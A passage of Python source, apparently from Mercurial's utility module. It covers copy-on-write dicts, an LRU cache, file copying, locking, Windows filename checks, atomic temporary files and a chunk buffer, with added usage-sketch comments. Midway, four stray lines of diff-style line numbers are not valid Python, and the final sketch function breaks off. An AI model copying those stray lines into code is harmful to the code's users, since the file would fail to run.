            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

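# End-to-end write flow (a hedged sketch; the key and values are arbitrary):
#
# >>> a = cowdict()
# >>> a = a.preparewrite()
# >>> a[b'k'] = 1
# >>> b = a.copy()          # cheap: b is a, with the copy count bumped
# >>> b = b.preparewrite()  # now b becomes a real, independent dict
# >>> b[b'k'] = 2
# >>> a[b'k'], b[b'k']
# (1, 2)
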
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired.

    If no transaction was provided, this simply runs the body and returns.
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

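# Sketch of the intended use (hedged; ``tr`` stands in for any transactional
# object and ``do_work`` for any body):
#
#   with acceptintervention(tr):
#       do_work()   # on success or InterventionRequired, tr.close() runs;
#                   # tr.release() always runs, aborting if never closed
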
@contextlib.contextmanager
def nullcontextmanager():
    yield

class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset

class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

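# Behavior sketch in the file's doctest style (hedged; keys are arbitrary):
#
# >>> d = lrucachedict(2)
# >>> d[b'a'] = 1
# >>> d[b'b'] = 2
# >>> d[b'a']          # touching b'a' makes it the freshest entry
# 1
# >>> d[b'c'] = 3      # at capacity, so the least recent key b'b' is recycled
# >>> b'b' in d, b'a' in d
# (False, True)
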
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

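# Unlike cachefunc above, this wrapper bounds the cache: once more than 20
# distinct arguments have been seen, the least recently used entry is
# dropped. A hedged sketch:
#
# >>> double = lrucachefunc(lambda x: x * 2)
# >>> double(21)
# 42
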
class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value

def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    if prop in obj.__dict__:
        del obj.__dict__[prop]

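# propertycache is a non-data descriptor: the first access computes the
# value and stores it in the instance __dict__, which then shadows the
# descriptor on later lookups. A hedged sketch (``thing`` is a made-up
# class):
#
# >>> class thing(object):
# ...     @propertycache
# ...     def answer(self):
# ...         print('computing')
# ...         return 42
# >>> t = thing()
# >>> t.answer
# computing
# 42
# >>> t.answer                           # served from t.__dict__, no call
# 42
# >>> clearcachedproperty(t, 'answer')   # next access recomputes
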
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

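# The effect is that early chunks are emitted quickly while later chunks are
# batched into larger writes. A hedged sketch with 512-byte pieces (assuming
# Python 2 string semantics, as this module does):
#
# >>> pieces = [b'x' * 512] * 8
# >>> [len(c) for c in increasingchunks(iter(pieces), min=1024, max=4096)]
# [1024, 2048, 1024]
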
def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7, but it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x

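# Typical application (a hedged sketch; ``buildindex`` is a made-up name):
# decorate a function that builds a large container so no collection passes
# run mid-build.
#
#   @nogc
#   def buildindex(entries):
#       return {e[0]: e for e in entries}
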
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

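# On a POSIX layout (a hedged sketch; the paths are made up):
#
# >>> pathto(b'/repo', b'/repo/a/b', b'a/c/d')
# '../c/d'
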
# the location of data files matching the source code
if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

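# The single-frame traceback check distinguishes a bad call (the TypeError
# is raised at the call boundary itself) from a TypeError raised deeper in
# the function body. A hedged sketch:
#
#   checked = checksignature(lambda a, b: a + b)
#   checked(1, 2)   # -> 3
#   checked(1)      # -> error.SignatureError, not a bare TypeError
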
# a whitelist of known filesystems where hardlinks work reliably
_hardlinkfswhitelist = {
    'apfs',
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))

def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num

_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return os.readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname, 'rb')
    r = fp.read()
    fp.close()
    return r

def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

1773 # File system features
1771 # File system features
1774
1772
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

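# Illustrative sketch (not part of the original module): a caller probing a
# repository's metadata directory before deciding whether case-folding
# normalization is required. The '.hg' path is assumed to exist.
def _needsfoldingsketch(repopath):
    return not fscasesensitive(os.path.join(repopath, '.hg'))
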
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc., but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

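# Illustrative sketch (not part of the original module): util.re is a drop-in
# replacement for the stdlib module as long as only IGNORECASE and MULTILINE
# are used; any other flag quietly falls back to the stdlib engine.
def _researchsketch(data):
    flags = remod.IGNORECASE | remod.MULTILINE
    return re.compile(br'^chunk', flags).findall(data)
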
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)

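# Illustrative sketch (not part of the original module): recovering the
# on-disk spelling of a user-supplied path on a case-insensitive filesystem;
# both arguments must already be normcase-ed, per the docstring above.
def _ondiskcasesketch(userpath, root):
    return fspath(normcase(userpath), normcase(root))
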
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass

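# Illustrative sketch (not part of the original module): deciding whether
# hardlinks are trustworthy in a destination directory before relying on
# them. The probe filename is invented for the example.
def _canhardlinksketch(destdir):
    probe = os.path.join(destdir, '.hardlink-probe')
    open(probe, 'wb').close()
    try:
        return checknlink(probe)
    finally:
        try:
            os.unlink(probe)
        except OSError:
            pass
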
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because it is
    meant as a drop-in alternative to a simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents as name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

class filestat(object):
    """Helper to exactly detect a change of a file

    The 'stat' attribute is the result of 'os.stat()' if the specified
    'path' exists; otherwise it is None. This avoids a preparatory
    'exists()' check on the caller's side.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        the same time in seconds (= S[n-1].ctime), and comparison of
        timestamps is ambiguous.

        The basic idea to avoid such ambiguity is "advance mtime 1 sec,
        if the timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        a change masked by colliding mtimes.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if the size of a file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be the previous filestat of 'path'.

        This skips avoiding ambiguity if the process doesn't have
        appropriate privileges for 'path', and returns False in that
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other

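# Illustrative sketch (not part of the original module): the intended call
# pattern around a guarded write, snapshotting the stat before the change and
# advancing mtime afterwards when the timestamps alone cannot distinguish old
# from new.
def _writecheckedsketch(path, data):
    oldstat = filestat.frompath(path)
    writefile(path, data)
    newstat = filestat.frompath(path)
    if newstat.isambig(oldstat):
        newstat.avoidambig(path, oldstat)
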
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    The checkambig argument of the constructor is used with filestat,
    and is useful only if the target file is guarded by a lock
    (e.g. repo.lock or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()

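# Illustrative sketch (not part of the original module): the context-manager
# form guarantees that readers of 'path' never observe a half-written file;
# an exception inside the block discards the temporary copy instead.
def _atomicwritesketch(path, data):
    with atomictempfile(path, 'wb') as fp:
        fp.write(data)  # lands in a temp copy; renamed into place on close()
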
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass

def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise

def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)

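# Illustrative sketch (not part of the original module): re-framing a stream
# of arbitrarily sized chunks into fixed-size reads; the 4-byte frame size is
# invented for the example.
def _reframesketch():
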